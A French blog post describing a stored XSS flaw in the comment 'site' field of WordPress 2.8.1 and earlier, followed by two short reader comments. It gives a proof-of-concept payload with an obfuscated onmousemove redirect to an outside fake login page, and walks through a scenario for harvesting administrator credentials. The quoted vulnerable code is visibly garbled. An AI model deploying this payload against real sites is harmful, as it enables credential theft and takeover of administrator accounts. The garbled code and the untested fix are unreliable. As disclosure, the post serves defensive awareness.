Une Vulnérabilité 0-day XSS a été trouver sur la dernière version de WordPress <=2.8.1 et précédente par le site chinois huandan.org.elle concerne le champ SITE dans la partie commentaires , et causé par un dysfonctionnement dans la partie du contrôle du code .
Scénario de l’attaque :
1- On poste un commentaire sur un site on entrant dans le champ site le code suivant :
POC :
http://www.hamza.ma/attaquesmassive/site_marocain’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,104,97,109,122,
97,46,109,97,47,119,112,108,111,103,105,110,46,112,104,112);
2- Sur la partie administration un administrateur survole sans cliquer sur le lien de l’url
3- il est redirigé automatiquement vers une page d’authentification FAKE ,dans notre exemple : http://www.hamza.ma/wplogin.php
4- l’administrateur re-rentre son Login et passe qui est stocké dans un fichier Domaine.txt
5- La page Fake redirige l’utilisateur vers son site .
D’autre scénario peuvent être mis en œuvre : attaques par shell …
Les failles dans le code:
Dans le fichier template.php du dossier \ wp-admin \ includes \ template.php , La variable $author_url n’est pas bien sécurisé
#$author_url = get_comment_author_url();
#
#case 'author':
#
# echo "
"; comment_author(); echo '
';
#
# if ( !emptyempty($author_url) )
#
# echo "a title="$author_url" href='$author_url'>$author_url_display
";
Aucun Patch officiel n’est encore Disponible .
Pour contourner Remplacer La variable ‘$author_url’ par « $author_url« 2 guillemet valent mieux qu’un .
Ohh! intéressant sa 😀
Ca ne fonctionne pas sur mon blog en 2.8.1 ..
bizzar